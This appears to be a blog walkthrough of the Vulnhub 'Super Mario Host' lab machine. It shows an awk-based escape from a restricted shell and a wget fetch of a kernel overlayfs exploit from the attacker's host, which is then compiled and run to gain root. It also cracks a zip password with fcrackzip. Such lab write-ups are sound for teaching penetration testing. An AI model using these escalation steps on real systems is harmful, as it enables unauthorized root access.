Press "Enter" to skip to content

Vulnhub Super Mario Host: 1.0.1 Walkthrough Part 2

It has been a long time since the first part of this host from Vulnhub. I apologize, I have simply forgot it. With this post, I want to finish the walkthrough of this host. The first part ended with the password of Luigi. The next obvious step is to connect to the host over ssh using the found password.

Escape the limited shell

Once connected to the host as Luigi, you will find yourself in a limited shell.

luigi@192.168.56.101's password: 
You are in a limited shell.
Type '?' or 'help' to get the list of allowed commands
luigi:~$ ?
awk  cat  cd  clear  echo  exit  help  history  ll  lpath  ls  lsudo  vim

As one can run commands with the awk tool, one can also launch a shell with it.

luigi:~$ awk 'BEGIN{system("/bin/bash")}'
luigi@supermariohost:~$ whoami
luigi

With that, we have successfully escaped the limited shell. The next step is to examine the host and escalate the privileges.

Privilege Escalation

Enumerating the system and searching through the files and the versions of services, one can find that the installed kernel version is outdated and that there are exploits available (https://www.exploit-db.com/exploits/37292/). Compiling and running it gives you a root shell.

luigi@supermariohost:/tmp$ uname -a
Linux supermariohost 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
luigi@supermariohost:/tmp$ wget http://192.168.56.102/overlay.c
--2018-08-25 08:18:13--  http://192.168.56.102/overlay.c
Connecting to 192.168.56.102:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5119 (5.0K) 
Saving to: ‘overlay.c’

100%[=================================================>] 5,119       --.-K/s   in 0s      

2018-08-25 08:18:13 (555 MB/s) - ‘overlay.c’ saved [5119/5119]

luigi@supermariohost:/tmp$ gcc overlay.c -o overlay
luigi@supermariohost:/tmp$ chmod +x overlay
luigi@supermariohost:/tmp$ ./overlay 
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),112(lshell),1001(luigi)

Get the Flag

In the root folder you will find a flag.zip file. This file is password protected. To find the password, I used the tool fcrackzip and the rockyou.txt wordlist.

# fcrackzip -D -u -p /usr/share/wordlists/rockyou.txt flag.zip 
PASSWORD FOUND!!!!: pw == ilovepeach
# unzip flag.zip 
Archive:  flag.zip
[flag.zip] flag.txt password: 
  inflating: flag.txt
# cat flag.txt 
Well done :D If you reached this it means you got root, congratulations.
Now, there are multiple ways to hack this machine. The goal is to get all the passwords of all the users in this machine. If you did it, then congratulations, I hope you had fun :D

Keep in touch on twitter through @mr_h4sh

Congratulations again!
								
mr_h4sh

I got root successfully. It seems that it is not over yet. However, I will end this part here and might publish the rest later. Hope you got something from this walkthrough. If you have any questions, leave a comment below.

Cheers

Be First to Comment

Leave a Reply

Your email address will not be published. Required fields are marked *